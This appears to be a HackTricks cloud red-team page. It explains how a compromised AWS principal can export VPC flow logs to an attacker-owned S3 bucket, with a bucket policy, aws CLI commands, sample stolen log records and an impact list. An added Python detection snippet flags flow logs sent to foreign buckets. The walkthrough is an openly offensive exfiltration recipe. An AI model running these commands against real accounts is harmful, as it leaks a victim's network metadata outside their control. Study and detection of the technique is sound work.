AWS - VPC Flow Logs Cross-Account Exfiltration to S3
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse ec2:CreateFlowLogs to export VPC, subnet, or ENI flow logs directly to an attacker-controlled S3 bucket. Once the delivery role is configured to write to the external bucket, every connection seen on the monitored resource is streamed out of the victim account.
Requirements
- Victim principal: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, and iam:PassRole (if a delivery role is required/created).
- Attacker bucket: S3 policy that trusts delivery.logs.amazonaws.com with s3:PutObject and bucket-owner-full-control.
- Optional: logs:DescribeLogGroups if exporting to CloudWatch instead of S3 (not needed here).
Attack Walkthrough
- Attacker prepares an S3 bucket policy (in attacker account) that allows the VPC Flow Logs delivery service to write objects. Replace placeholders before applying:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}
Apply from the attacker account:
aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
- Victim (compromised principal) creates the flow logs targeting the attacker bucket:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions> # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"
Within minutes, flow log files appear in the attacker bucket containing connections for all ENIs in the monitored VPC/subnet.
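As an added detection example (not code from the original page): the following Python flags any flow log in an account whose S3 destination bucket is not one the account itself owns, which is exactly the configuration the walkthrough above creates. It runs over constructed sample data shaped like boto3's ec2.describe_flow_logs()['FlowLogs'] and s3.list_buckets()['Buckets']; the flow log ids, VPC ids and bucket names are made up.

```python
"""Flag VPC flow logs that deliver to an S3 bucket this account does not own."""


def bucket_from_arn(destination):
    """Return the bucket name from an S3 log-destination ARN, else None.

    'arn:aws:s3:::my-bucket/flowlogs/' -> 'my-bucket'
    """
    prefix = "arn:aws:s3:::"
    if not destination.startswith(prefix):
        return None
    return destination[len(prefix):].split("/", 1)[0]


def find_external_s3_flow_logs(flow_logs, owned_buckets):
    """Return flow logs whose S3 destination is not in owned_buckets.

    flow_logs: list of dicts as returned by ec2.describe_flow_logs()['FlowLogs']
    owned_buckets: bucket names from s3.list_buckets() for this account
    """
    owned = set(owned_buckets)
    findings = []
    for fl in flow_logs:
        if fl.get("LogDestinationType") != "s3":
            continue  # CloudWatch Logs / Firehose destinations are out of scope here
        bucket = bucket_from_arn(fl.get("LogDestination", ""))
        if bucket is None or bucket not in owned:
            findings.append({
                "FlowLogId": fl["FlowLogId"],
                "ResourceId": fl.get("ResourceId"),
                "Bucket": bucket,
                "TrafficType": fl.get("TrafficType"),
            })
    return findings


# Constructed sample data for the example; not taken from a real account.
SAMPLE_FLOW_LOGS = [
    {"FlowLogId": "fl-0aaa", "ResourceId": "vpc-0123", "LogDestinationType": "s3",
     "LogDestination": "arn:aws:s3:::corp-flowlogs/prod/", "TrafficType": "ALL"},
    {"FlowLogId": "fl-0bbb", "ResourceId": "vpc-0123", "LogDestinationType": "s3",
     "LogDestination": "arn:aws:s3:::unknown-external-bucket/flowlogs/", "TrafficType": "ALL"},
    {"FlowLogId": "fl-0ccc", "ResourceId": "subnet-0456", "LogDestinationType": "cloud-watch-logs",
     "LogDestination": "arn:aws:logs:us-east-1:111111111111:log-group:/vpc/flow"},
]
SAMPLE_OWNED_BUCKETS = ["corp-flowlogs", "corp-backups"]

if __name__ == "__main__":
    for finding in find_external_s3_flow_logs(SAMPLE_FLOW_LOGS, SAMPLE_OWNED_BUCKETS):
        print("ALERT: flow log delivers to a bucket outside this account:", finding)
```

The same check works as a CloudTrail rule: a CreateFlowLogs event with requestParameters.logDestinationType "s3" and a logDestination bucket absent from the account's bucket list is the signal to alert on.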
Evidence
Sample flow log records written to the attacker bucket:
version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK
Bucket listing proof:
aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize
Impact
- Continuous network metadata exfiltration (source/destination IPs, ports, protocols) for the monitored VPC/subnet/ENI.
- Enables traffic analysis, identification of sensitive services, and potential hunting for security group misconfigurations from outside the victim account.